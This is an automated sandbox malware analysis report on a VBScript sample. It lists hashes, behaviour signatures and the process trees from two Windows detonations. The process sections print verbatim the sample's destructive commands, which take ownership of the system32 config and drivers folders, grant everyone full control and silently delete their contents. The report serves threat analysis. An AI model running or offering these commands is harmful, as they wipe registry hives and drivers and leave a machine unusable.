Malware Analysis Report

2024-11-16 12:52

Sample ID: 240815-1gj16szhjn
Target: target.vbs
SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
Tags: discovery exploit
Score: 8/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 8/10

SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

Threat Level: Likely malicious

The file target.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-15 21:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-15 21:37
Reported: 2024-08-15 21:39
Platform: win7-20240704-en
Max time kernel: 121s
Max time network: 121s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2512 wrote to memory of 2264 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2512 wrote to memory of 2264 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2512 wrote to memory of 2264 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2264 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2844 wrote to memory of 2564 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2844 wrote to memory of 2564 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2844 wrote to memory of 2564 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2744 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2796 wrote to memory of 2744 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2796 wrote to memory of 2744 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 6425a144c5de5bc3bcd5865809150a0d
SHA1 257d00e71e71832c90fc494b5121df3a8149560d
SHA256 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

C:\Users\Admin\Desktop\ConvertFromUndo.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-15 21:37
Reported: 2024-08-15 21:39
Platform: win10v2004-20240802-en
Max time kernel: 149s
Max time network: 151s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\Notepad.exe | N/A
N/A | N/A | C:\Windows\System32\Notepad.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf"

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\thescript.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ConfirmResize.vbs"

Network


Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 6425a144c5de5bc3bcd5865809150a0d
SHA1 257d00e71e71832c90fc494b5121df3a8149560d
SHA256 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

C:\Users\Admin\Desktop\desktop.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

C:\Users\Admin\Music\SuspendProtect.mp3

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

C:\Users\Admin\AppData\Local\Temp\target.wsf

MD5 7efc82c24c2ce07d6e37f750cc9aa312
SHA1 24641d0653f3b3b850b25319bdae26bf1a46040a
SHA256 78d136408cfd4790b861a67f1a7acb826c7c7e8ee75aa7fa5b60ae6e33216d4f
SHA512 a1a3ee6fa3bfede92806362447b787a29b3ad1e9f64322eec4c8ef38e7a3742eef843373da1461512bc7ee83953344ff67fff2c46eb57fc2feca9e632847edde